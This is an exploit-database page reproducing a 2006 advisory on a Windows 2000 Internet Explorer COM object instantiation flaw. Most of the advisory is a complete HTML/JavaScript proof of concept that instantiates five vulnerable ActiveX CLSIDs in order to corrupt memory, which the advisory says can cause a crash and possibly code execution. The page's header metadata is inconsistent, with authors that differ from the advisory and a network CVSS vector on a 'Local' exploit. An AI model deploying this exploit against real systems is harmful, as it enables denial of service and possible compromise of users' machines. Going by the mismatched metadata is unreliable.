Advertisement






Windows 2000 Multiple COM Object Instantiation Vulnerability

CVE Category Price Severity
CVE-2005-2103 CWE-264 N/A High
Author Risk Exploitation Type Date
Yaniv Miron, Aviram Jenik High Local 2006-09-05
CPE PURL
cpe:cpe:/o:microsoft:windows_2000
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006090002

Below is a copy:

Advisory ID:
XSec-06-08

Advisory Name:
Windows 2000 Multiple COM Object Instantiation Vulnerability

Release Date:
08/21/2006

Tested on:
Windows 2000/Internet Explorer 6.0 SP1

Affected version:
Windows 2000

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
Multiple vulnerability has been found in Windows 2000, When Internet Explorer tries to instantiate the ciodm.dll, MyInfo.dll,msdxm.ocx,Creator.dll(Media player 9) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== 2000obj.htm start ================

<!--

// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN

// http://www.xsec.org
// nop (nop#xsec.org)

--!>
<html>
<head>
<title>COM-tester</title>
</head>
</body>
<script>
var i =0;
var clsid = new Array(

// NO: 1
// CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
// Info: Microsoft Index Server Catalog Administration Object
// ProgID: Microsoft.ISCatAdm.1
// InprocServer32: C:WINNTsystem32ciodm.dll
"{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",

// NO: 2
// CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
// Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1
// InprocServer32: C:WINNTsystem32inetsrvMyInfo.dll
"{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",

// NO: 3
// CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
// Info: RadioServer Class
// ProgID: Mmedia.RadioServer.1
// InprocServer32: C:WINNTsystem32msdxm.ocx
"{8E71888A-423F-11D2-876E-00A0C9082467}",

// NO: 4 media player?
// CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
// Info: CdCreator Class// ProgID: Creator.CdCreator.1
// InprocServer32: C:Program FilesCommon FilesAdaptec
SharedCreatorAPIcreator.dll
"{606EF130-9852-11D3-97C6-0060084856D4}",

// NO: 5 media player?
// CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
// Info: CdDevice Class// ProgID: Creator.CdDevice.1
// InprocServer32: C:Program FilesCommon FilesAdaptec
SharedCreatorAPIcreator.dll
"{F849164D-9863-11D3-97C6-0060084856D4}",

// END
null
);

while(clsid[i])
{
var a = document.createElement("object");

window.status = "Testing Object " + clsid[i] + "...";

a.setAttribute("classid", "clsid:" + clsid[i]);

i++;
}

window.status = "failed!";

</script>
</body>
</html>

=============== 2000obj.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16

About XSec:
We are redhat.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum